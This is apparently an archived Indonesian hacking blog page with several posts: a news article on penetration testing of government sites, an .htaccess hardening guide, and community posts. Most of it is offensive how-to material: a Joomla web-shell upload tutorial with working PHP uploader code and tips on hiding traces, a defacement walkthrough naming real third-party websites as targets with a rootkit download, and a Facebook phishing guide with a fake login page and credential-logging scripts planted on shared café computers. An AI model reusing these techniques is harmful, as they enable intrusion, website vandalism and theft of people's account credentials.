Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Situs-situs Pemerintah Bakal Dikawal "Tim Macan"


KOMPAS.com — Serangan hacker "Anonymous Indonesia" minggu lalu seakan menunjukkan bahwa situs-situs milik pemerintah masih memiliki kerentanan dalam hal sekuriti.

Untuk meningkatkan keamanan-keamanan situs tersebut, diperlukan semacam pengecekan rutin untuk memeriksa celah-celah atau potensi ancaman yang ada.

Itulah yang hendak dilakukan oleh I Made Wiryana, praktisi IT yang juga mengelola situs Presiden RI. Caranya, melalui agen atau program yang akan secara otomatis memeriksa kelemahan-kelemahan yang ada pada situs bersangkutan.

"Jadi istilahnya tes penetrasi. Ada 'tiger team' yang melakukan uji keamanan terhadap situs-situs online. Kalau agen menemukan anomali, misalnya tampilan situsnya berubah, ada exploit, atau kecepatan aksesnya melambat, akan langsung dilaporkan ke tim," ungkap Made dalam percakapan telepon dengan Kompas Tekno, Senin (4/2/2012).

Tiger team atau "tim macan" adalah istilah untuk sejumlah ahli yang ditugaskan mencari setiap kelemahan sekuriti yang ada pada sebuah sistem.

Menurut pria yang juga aktif sebagai dosen dan pegiat Linux di Indonesia ini, pengelola situs online tak ubahnya pemilik gedung yang mesti mengadakan pengecekan rutin terhadap bangunan.

"Misalnya saya sebagai pemilik, tentulah saya ingin tahu, misalnya, bagaimana situasi penjagaan waktu malam hari, apakah satpamnya aktif berjaga atau tidur, lalu apakah sistem pemadam kebakaran berjalan baik atau tidak," Made memberi perumpamaan.

Tentu, pengecekan keamanan pun harus dilakukan seizin pemilik "bangunan" yang bersangkutan karena metode tes penetrasi yang dilakukan persis dengan hacker atau cracker yang bertujuan membobol situs.

"Antara pengecek keamanan dan maling, caranya sama, hanya motivasinya yang berbeda. Kalau maling kan tidak izin dulu, ha-ha-ha," canda Made.

Agar tak salah disangka sebagai penyerang, Made mengatakan bahwa program otomatis ini akan diberi ID khusus yang sebelumnya sudah diketahui oleh pengelola situs. Terkait persoalan etiket, pengecekan keamanan memprioritaskan situs-situs pemerintah, terutama yang sudah memberi izin untuk diperiksa.

Untuk saat ini, metode pengecekan keamanan tersebut baru coba diterapkan di situs-situs pemerintah yang turut dikelola Made, yaitu situs Presiden RI, Wapres, Kemenpora, dan satu situs lagi di bawah Kementerian Pendidikan dan Kebudayaan.

Soal eksekusi program itu nantinya, Made berharap bisa menggandeng pihak-pihak terkait seperti Kementerian Komunikasi dan Informatika serta Computer Emergency Team Indonesia (ID-CERT).

Made mengharapkan semua situs pemerintah bisa turut berpartisipasi dalam program pengecekan keamanan otomatis itu. "Soalnya, aspek keamanan harus dimonitor secara kontinu. Celah sekuriti yang dua tahun lalu belum ada bisa saja muncul hari ini."

Lokal lebih mudah

Untuk meningkatkan keamanan situs-situs online di Indonesia, Made menyarankan agar para penyelenggara sistem elektronik termasuk situs pemerintah dan kalangan bisnis memindahkan data center atau pusat data ke Indonesia serta memakai domain ".id".

Hal ini sejalan dengan Peraturan Pemerintah Nomor 82 Tahun 2012 (PP No 82/2012) tentang Penyelenggaraan Sistem dan Transaksi Elektronik yang mewajibkan setiap penyelenggara sistem elektronik untuk pelayanan publik menempatkan pusat data dan pusat pemulihan bencana di Indonesia.

"Saya sangat mendukung itu (PP No 82/2012) agar keamanannya mudah ditelusuri. Kita bisa minta data soal siapa saja yang akses ke PANDI (Pengelola Nama Domain Internet Indonesia). Kalau domain '.info', misalnya, proses untuk itu terlalu panjang," papar Made.

Dia melanjutkan, kebanyakan situs pemerintah dalam hal ini telah menggunakan domain lokal dengan akhiran ".go.id". "Meski ada juga beberapa yang belum karena berada di bawah departemen tertentu."

Mengenai keamanan situs online milik sejumlah kementerian yang ada di Indonesia, Made mengatakan bahwa banyak di antara situs-situs tersebut merupakan proyek bisnis hasil kerja sama dengan pihak ketiga. "Begitu sudah selesai, maka monitoring-nya tidak dilanjutkan. Di sinilah pentingnya pengecekan keamanan secara kontinu," pungkasnya.
sumber 

4 Trik Cara Upload Shell di Joomla

hai ...., dah lama ga nulis di blog.
kali ini ane mo share sdikit bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. kali aja ada yg belom tau, kaya newbie seperti ane.

okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.

CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php

[Image: jom15_zps5d089831.png]
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.

[Image: jom13_zps46408fd5.png]
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php

[Image: jom14_zps9182e03f.png]


CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :p
Klik menu Extension > template manager

[Image: jom1_zps8519f91b.png]
trus pergi di bagian administrator.

[Image: jom2_zpsd4100d72.png]
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> http://fake.hol.es/123/shell/simple_uploader.txt
ato ini


<?php
echo '<b>E1nzte1N uploader</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }
else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }
}
?>
mari kita sisipin uploadernya, ane taro dibawah aja.

[Image: jom4_zps8c473e97.png]
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.

[Image: jom5_zpsc119e561.png]
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php

[Image: jom6_zpsb46f9ae3.png]
*kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.
:)

CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita

[Image: jom7_zpsde233746.png]
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php

[Image: jom8_zpsa2810d4a.png]
:)


lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php

[Image: jom9_zps0a6b1c1f.png]
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template "evil" kita td :p
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.

[Image: jom10_zpscc71a5bb.png]
The parameter file /templates/siteground-j15-196/params.ini is writable!
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php

[Image: jom11_zpsa71b6771.png]
:)

hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) komen juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.

okedeh, sekian tutorial cupu bin jadul. dr ane.

Tambahan dr abang Sohai , upload shell di joomla versi 2.5.x



[Image: 309927_556901724320519_1516587677_n.jpg]


[Image: 550018_556901907653834_342723693_n.jpg]


[Image: 408430_556901934320498_1928638876_n.jpg]


[Image: 73394_556901954320496_438723634_n.jpg]


[Image: 309953_556901974320494_2097353767_n.jpg]

.htaccess Security




haha.. lama juga ga ngurusin blog, kbnyakan posting di forum, ktmu lg sama ane. newbie yg cupu abiez .. Mentok sebelumnya artikel ini uda ane post di forum, mau ane salin juga ke blog ah..
kali ini ane mw share bbrpa konfigurasi .htaccsess buat keamanan serper.
okeh, sebelumnya buat yg belom tau apa itu .htaccsess.. ane kasi info dulu, sesuai en.wikipedia.org/wiki/Htaccess


File .htaccess adalah file teks ASCII sederhana yang terletak di direktori www atau di sebuah sub direktori folder www. Anda bisa membuat atau mengedit file ini di Text Editor (Notepad) dan kemudian meng-uploadnya ke direktori yang ingin anda ubah setting-nya. Pastikan bahwa file tersebut diupload dalam format ASCII bukan BINARY, dan pastikan file permission untuk file tersebut telah diset menjadi 644 (rw-r-r–). Hal tersebut memungkinkan server untuk mengakses file tapi mencegah user untuk mengakses file tersebut dari browser mereka.
ntu sedikit penjelasan tentang .htaccess dan pada trit cupu ane kali ini ane ga akan banyak menjelaskan tentang apa dan bagaimana itu file .htaccess, tp beberapa kegunaan file ini yang akan bermanfaat
untuk Security. Okeh langsung cruutz aja yak.. Ngakak

1. Mencegah Akses Ke .htaccess
Tambahkan baris berikut untuk menambah keamanan dari file .htaccess sehingga apabila ada usaha untuk mengakses file tersebut akan muncul pesan kesalahan 403. Tentu saja tidak lupa memberi-kan file permissionnya menjadi 644.


order allow,deny
deny from all

2. Mencegah Akses Ke File Tertentu
Untuk membatasi akses ke file tertentu kita dapat menggunakan perintah berikut.Ganti nama rahasia.txt menjadi sesuai dengan kebutuhan anda.Nantinya file tersebut akan disembunyikan dan apa-bila terdapat usaha untuk mengakses file tersebut akan terjadi error 403.


order allow,deny
deny from all

3. Mencegah Akses Ke Banyak File
Kita bisa mengganti beberapa extension dibawah sesuai dengan yang kita butuhkan.


Order Allow,Deny
Deny from all

4. Mencegah User Melakukan Browsing Pada Setiap Direktori Server Kita

Options All -Indexes


4.1. Mengijinkan User Melakukan Browsing
Jika mengijinkan user untuk melakukan browsing pada “direktori yang telah kita tentukan” cukup menambahkan perintah seperti dibawah ini.(Cukup tempatkan file .htaccess pada folder yang diinginkan)

Options All +Indexes

4.2. Mencegah User Melakukan Browsing Tanpa Pesan Error 403

IndexIgnore *


4.3. Mencegah User Melakukan Browsing Dengan Membatasi Extension File.

IndexIgnore *.wmv *.mp4 *.avi *.etc

5. Mengubah Index File
Secara default apabila kita membuat beberapa file dan salah satunya terdapat index file, maka file tersebutlah yang akan dijalankan terlebih dahulu. Dengan menggunakan .htaccess kita dapat merubah-nya menjadi nama file yang kita inginkan.

DirectoryIndex penggantiindex.php

6. Menyamarkan Extension PHP
Mungkin “LOL”, “hacking”, dll. Nah dengan kode berikut, file tersebut akan tetap dibaca sebagai file PHP. Sedikit catatan, biasanya saya mencari file httpd.conf dan menambahkan extensionnya disitu, akan tetapi inilah kelebihan .htaccess. Kita tidak perlu merubah settingan asli pada Apache.

AddType application/x-httpd-php .hacking

7. Membatasi Akses Ke LAN (Local Area Network)


order deny,allow
deny from all
allow from 192.168.1.5


7.1. Bisa Menambahkan Domain


order allow,deny
allow from all
deny from 192.168.1.5
deny from .*domain\.com.*


8. Memberikan Password Pada File



AuthType Basic
AuthName "Prompt"
AuthUserFile /home/path/.htpasswd
Require valid-user


9. Memberikan Password Pada Banyak File


AuthType basic
AuthName "Development"
AuthUserFile /home/path/.htpasswd
Require valid-user


9.1. Memberikan Password Pada Direktori Dimana .htaccess Berada

resides
AuthType basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user

10. Otomatis Memberikan CHMOD Kepada Setiap File

chmod .htpasswd files 640
chmod .htaccess files 644
chmod php files 600


11. Melindungi Dari Serangan DOS ( Denial Of Service ) Dengan Membatasi Upload File
Ini adalah salah satu metode sederhana yang bisa kita gunakan untuk mencegah serangan DOS. Disini kita membatasi ukuran upload sebesar 10240000 byte yang setara dengan 10 mb.

LimitRequestBody 10240000

12. Mengamankan Direktori Dari Pengeksekusian Script Atau File

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI


hmmh... segitu dulu deh,, Capek moga bermanfaat yah Bigsmile

credit: Cruz3N (thanks om, uda bagi ilmunya)

Semarak 4 Tahun HN Community


Yah.. emang telat sih, Ulang tahun HN Community uda tgl 7 Januari 2012 kmaren, tp gpplah.. kata ornag bijak mah, "better late than never" wkwkwk .. ikut ngramein ajah.. dlm Semarak 4 Tahun HN Community. Ga krasa yah uda 4 tahun, HN Community online di Dunia Maya. terlebih di dunia Underground.

di Semarak 4 Tahun HN Community ini ane mw crita ttg gmana join di HN Community. ane baru join HN Community pas tgl 10-21-2010, jd baru 2 thun ane jd member HN Community . ane tau HN dr kumpulan link yg ada di Indonesian Hacker. Ane sebelumnya emang join di Indonesian Hacker. trus ngliat ada link partner di sidebar IH, ane coba klik. trus ane join di HN Community. pertama join, wowh.. keren. dr tampilannya aja uda milworm bgt. antara warna ijo ma item. pertama ane bkin trit perkenalan. ga nyangka.. respon sambutannya cpet bgt n rame. beda sama forum laen. di HN Community mah senior2nya ramah. member2 yg laen jg ramah bgt. setiap ada member baru pasti disambut dg hangat. pernah ane di forum sbelah.. baru kenalan uda dpet bad reputation alias di bata. :dead: , kapok dah.. ga betah ane.. apalagi bulan Januari ini, dimana Semarak 4 Tahun HN Community lg gencar2nya.. bnyak member yg ikut ngramein dg aksi deface dimana2. deface situs sana deface sini dengan tampilan index deface Semarak 4 Tahun HN Community. ane uda bnyak join forum2 underground laen. tp ane paling betah di HN Community.. ngerasa paling nyaman di HN Community. HN Community paling TOP dah.. ! :cheer: di HN Community anak2 nya juga ga pelit ilmu, ane bnyak blajar di HN Community.

Thanks buat semua staff n member2 HN Community yg udah bantuin blajar ane selama ini. dengan semangat Semarak 4 Tahun HN Community ini, semoga dengan bertambahnya umur HN Community forum juga semakin bnyak ilmunya. semakin eksis di Dunia Maya maupun di Dunia Nyata. Semarak 4 Tahun HN Community Maju terus HN Community. :bahagia: itulah sejarah singkat ane masuk HN Community. skrng sejarah singkat terbentuknya HN Community yah.. ane copas dr blognya HN,

HN berawal dari sebuah room kecil yang berdiri pada tgl 8 Januari 2008. Room kecil yang hanya mampu menampung 25 orang itu di beri nama Hacker_Newbie. Maksud founder memberi nama itu adalah untukmenegaskan, semakin elite seorang hacker, semakin ia merasa masih newbie. Dengan begitu ia akan terus merasa kalau ilmu dia belumlah cukup, dan dia akan terus belajar dan belajar.

Walaupun room itu baru, tapi sudah dapat menarik banyak pengunjung dan sudah mampu menyaingi room2 lain sejenis. Beberapa bulan kemudian staff sepakat utk membuat web http://hacker-newbie.890m.com/.utk HN, waktu itu masih hosting gratisan dngan alamat Website cukup ramai, walaupun forumnya agak sepi.

Web ini tidak berjalan lama… hanya beberapa bulan, web hilang begitu saja. Belum jelas kenapa web ini bisa hilang. Setelah kehilangan itu, HN sempat vakum beberapa bulan hingga akhirnya seluruh staff di kumpulkan kembali dan sepakat membuat forum baru.

Kali ini menggunakan hosting berbayar. Dengan donasi dari salah satu member, akhirnya forum HN jilid 2 berhasil di bangun pada bulan April 2009 dgn alamat hacker-newbie.net.

Tapi sayang, forum ini hanya bertahan 3 hari saja. Ironisnya sang Admin sendiri yang menghancurkan forum tsb. Akhirnya founder memecat admin tsb dari jajaran admin HN.

Dan selang 1 bulan tepatnya tgl 10 Mei 2009, founder membangun forum baru utk HN yang berdiri hingga sekarang, dng hosting baru dan domain baru yaitu hacker-newbie.org. Beberapa staff baru-pun di angkat sbg ujung tombak HN, dng di bantu oleh para Team dan Crew.

HN Community berkembang dng sangat pesat. Baru 8 bulan, member HN Community sudah 2000+ dan di kunjungi 50+ orang setiap harinya. Sikap staff dan admin yg lebih fokus pada kemanan dalam forum ketimbang luar forum, membuat HN mampu bertahan saat terjadi cyber war, di saat forum-forum lain berguguran satu per satu.

okeh, uda pd tau khan.. hehe, ane cm mw sharing aja kok.. ttg sejarah ane masuk
HN Community sama sdikit crita ttg terbentuknya HN Community. ikut ngramein Semarak 4 Tahun HN Community, sekian dulu yah..
thanks uda mau baca..

viva la
HN
Semarak 4 Tahun HN Community
Semarak 4 Tahun HN Community






Semarak 4 Tahun HN Community

HN Community Anthem buat backsound deface


Buat yang suka dipes.. ane mau share backsound bagus.. karena ane member HN Community.. maka dr itu ane pake backsound lagu kebangsaan HN Community.. lagu ini diciptain sama omz jos_ali_joe dan band nya. sebagai rasa terima kasih kepada mas ali dan band nya, tak ada salahnya kita selalu menggunakan lagu ini di halaman deface anak2 HN yg lain.

link download lagu

embed c0de:
<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash">
<param value="#ffffff" name="bgcolor" />
<param value="mp3=http://www51.indowebster.com/909085259d408067811cc31e0bd6a8fd.mp3&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars" />
</object>

lirik lagunya kek gini :
We are a members of Hacker Newbie
We never stop to finish all problem
We are a members of Hacker Newbie
Everytime we always do together

Whenever I want to hack
We always do it for something bad
Don't ever think your sites is safe
We can do it without your sight.

Hacker Newbie 2x
Ooooooooo
Hacker Newbie 2x
Ooooooooo

We are a members of Hacker Newbie
We start learn from junior to master
We are a members of Hacker Newbie
And dont see us like a cracker



^_^

Download

Download Tools

[POC] Deface instan pake Rootkit bkinan om Hmei7

Langsung ke TKP aja yah..

Tools Rootkit By Mastah Hmei7
Download :
http://www.mediafire.com/?ebjt2ccjvvyrm37
>> Pass: cbf

Berikut kronologinya..
1.Jalanin aja rootkit.exe , trus klik "webdave" > "asp shell maker"


2.Kemudian muncul kek gni , trus klik "add site"


3.Masukin targetnya
Contoh Target :

http://www.hrbswx.com/
http://www.bao168.com
http://www.hkloong.com
http://www.gteec.com/
http://www.balingshan.com/
http://www.871871.cc/
http://www.md999.net.cn/
http://bbs.nan-gang.gov.cn/
http://www.icts-mz.com/
http://www.hnains.net/
http://www.hlyy-sh.com/
http://www.hsgtzy.gov.cn/

4.Pilih salah satu web diatas.
Contoh : http://www.hrbswx.com/


5.Klo udah klik ok, truz klik setting..
Name off your shell : /Hmei7.asp;.txt
Ganti pake nama file tmen2 hn skalian..
Contoh : coba.html

khan disitu ada tulisan --> "Write Your Shell Here"
Hapus Semua Script yg disana.
trus ganti aja pake script deface kalian.

klo udah klik "Serang!!"


Lihat dikotak putih [ Sebelah kiri ]
Jika ada tulisan

checking : http://www.hrbswx.com
shell created !!
http://www.hrbswx.com/coba.html

Berarti berhasil..


Langsung aja kita cek di web target http://www.hrbswx.com/coba.html
Sukses omz..

Hehehe.. makasih buat om Hmei7. Buat toolnya..


demikianlah.. acara blajar bareng kita.. moga bermanfaat yah..

Top 5 Hacker Paling Cantik Sedunia

Inilah Daftar Hacker yang Paling di Takuti tapi Juga Cantik dan sexy
Hacking, dunia bawah tanah keras nan unik. Kebanyakan ahli-ahli dalam bidang hacking didominasi oleh kalangan pria. Tapi, siapa sangka ternyata wanita juga banyak ambil bagian dalam dunia ini. Kemampuan serta kiprahnya pun tidak kalah dengan kaum adam. Berikut ini bahasan 5 Hacker Wanita Paling eksis di Dunia.

1. Ying kracker

[Image: Yingkracker00.jpg]

ying kracker, seorang pengajar dari shanghai Cina. Dia mengajar tentang panduan dasar proses hacking, cara merubah IP address atau memanipulasi password kantor! Dia juga ahli dalam membuat software hacker.
Dalam sebuah forum yang berjudul Chinese Hottie Hackers, namanya banyak dibahas dan itu membuat popularitasnya semakin menanjak. Dalam forum tersebut juga dia mempunyai anggota fans yang cukup banyak. Disitulah awal kredibilitasnya melambung.

2. Xiao Tian

[Image: gwqneloi.jpg]

Teringat dengan kata hacker, biasanya yang terlintas di bayangan adalah seorang kutu buku dengan kaca mata tebal dengan gaya hidup yang acak-acakan. Tapi tidak berlaku untuk Xiao Tian. Dia adalah seorang hacker yang modis.Penampilan dan gaya hidupnya begitu rapi, dinamis bahkan terkesan feminim.
ia juga tertarik sekali dengan dunia fashion, khususnya sepatu. Dalam blog nya dia sering berbagi cerita tentang tempat-tempat yang pernah dia datangi. Itulah alasan mengapa Xiao memiliki banyak fans dan followers di dunia, khususnya para pria.
Xiao Tian, mulai dikenal sejak umur 19 tahun. Setelah membentuk China Girl Security Team, salah satu kelompok hacker khusus wanita terbesar di china. Kiprahnya dalam dunia hacking juga tidak diragukan lagi. Raksasa search engine nomor satu di dunia, Google pun pernah merasakan serangan hebat dari Tian beserta timnya. Xiao Tian melakukan serangan canggih terhadap sistem infrastruktur google china. Bahkan, google akhirnya tidak tahan dan memilih untuk menarik semua layanan operasionalnya di China akibat hantaman hacker yang bertubi-tubi tersebut.

3. Joanna Rutkowska

[Image: 206596599_26b47ed2dd.jpg]

Joanna Rutkowska adalah seorang wanita polandia yang tertarik dengan dunia hacking security. Namanya pertama kali dikenal setelah konferensi Black Hat Briefings di Las Vegas, agustus 2006. Dimana saat itu Rutkowska mempresentasikan proses serangan yang telah dia lakukan terhadap sistem keamanan windows vista. Tidak hanya itu, Rutkowska juga pernah menyerang Trusted Execution Technology dan System Management Mode milik Intel.

Awal 2007 dia membentuk Invisible Things Lab di Warsawa, Polandia. Sebuah perusahaan yang berfokus terhadap research keamanan OS juga VMM serta layanan konsultasi keamanan internet. Tahun 2010 juga Rutkowska bersama Rafal Wojtczuk membentuk Qubes, sebuah Operating System yang sangat full protect security. Rutkowska juga pernah memberikan saran terbuka untuk Vice President of Microsoft Security Technology Unit untuk lebih memperketat sistem keamanan dalam windows vista. Waw, Rutkowska memang seorang hacker yang sangat welcome untuk diajak bekerjasama.

4. Kristina Svechinskaya

[Image: kristina-svechinskaya-collage.jpg]

Kristina Svechinskaya adalah seorang mahasiswi New York University yang ditahan pada 2 november 2010 lalu karena telah membobol jutaan dollar dari beberapa bank di Inggris dan Amerika. Bersama 9 orang lainya, Svechinskaya meng-hack ribuan rekening bank dan diperkirakan total fresh money yang telah digasaknya itu sekitar 3 juta dollar.

Svechinskaya beserta tim awalnya menargetkan jumlah uang yang dicurinya adalah sekitar 220 juta dollar. Svechinskaya menggunakan Zeus Trojan Horse untuk menyerang ribuan rekening bank. Dia memiliki setidaknya 5 rekening bank dunia untuk mencairkan dananya. Dalam aksinya itu, Svechinskaya juga melakukan pemalsuan paspor dan untuk itu total dia dituntut hukuman 40 tahun penjara bila terbukti bersalah. Seperti dilihat di gambar, bra yang digunakan gadis cantik ini terbuat dari berlian. Svechinskaya juga mendapat julukan sebagai hacker terseksi di dunia. Ya, karena memang tampilan wajah, tatapan mata dan gaya berbusana Svechinskaya bisa membuat orang-orang tak berkedip.

5. Raven Adler

[Image: hackers-alder1.jpg]
Di urutan terakhir, kita punya Raven Adler. Seorang wanita berpenampilan gothic yang tertarik dengan dunia internet, khususnya dunia hacking. Raven adalah wanita pertama yang pernah hadir dalam konferensi hacker DefCon. Perhatian konferens tentu saja tertuju penuh untuknya. Tapi dia mengaku tidak ingin memanfaatkan gender nya sebagai wanita untuk mendongkrak kredibilitasnya sebagai hacker. Dalam banyak kesempatan pula, dia tidak begitu senang dipanggil dengan sebutan ‘Hacker Wanita’. Dia lebih senang dipandang karena skill nya, bukan karena posisinya yang spesial sebagai seorang wanita.

Saat ini dia aktif mendesign, menguji dan mengaudit sistem detektor keamanan untuk berbagai agen-agen federal besar. Selain itu, di sela-sela kesibukanya dia juga telaten mempelajari ilmu beladiri Ryu Shorin Matsumura.

gimana?
adakah hacker wanita indonesia yang bisa sekaliber mereka??

Phising facebook With Fake Login


buat MASTER-MASTER anggap aj coretan ini angin lewat!

wuih...akhirnya beres jg hsil phising ku,
mungkin ini hal yg sangat basi dikalangan MASTER-MASTER, tpi buat yg very-very newbie kya ane! ini lumayan membantu buat pengetahuan!
awal mulanya dri dlu sya penasaran dngn cara phising fb/fake login, tpi sya tdk prnah mempraktekannya (alias males)hehe, malah saya meremehkannya.
ane coba bbrp hostingan yg free tpi pda ga kepake, ampe ane nanya ma om misterfribo & ichitobandito, mksh gan!!hehe

coba bka contoh punya ane!
http://faceb00kilogin.t35.com/login/index.php
ni hasilnya
http://faceb00kilogin.t35.com/password.jpg


langsung aja!
ane ngambil script yg dipake oleh om "ay1ef" maaf gan
- index.php
- kena.php
- passwords.txt

script nya bsa didownload dsni
Download

upload 3 file itu di hostinganmu, kalo ane pake yg free di www.t35.com lmayan buat iseng!

udh gtu ente tebar deh index.php yg tdi di upload di hostingan!
kLo ane sih ditebar diwarnet langsung disave di Mozilla&flok!
caranya klik tools-options-main trus paste index.php nya di "Home page: http://faceb00kilogin.t35.com/login/index.php"

maaf klo ad slah kta!
maklum bru bljr!

_Im|VeryNewBie_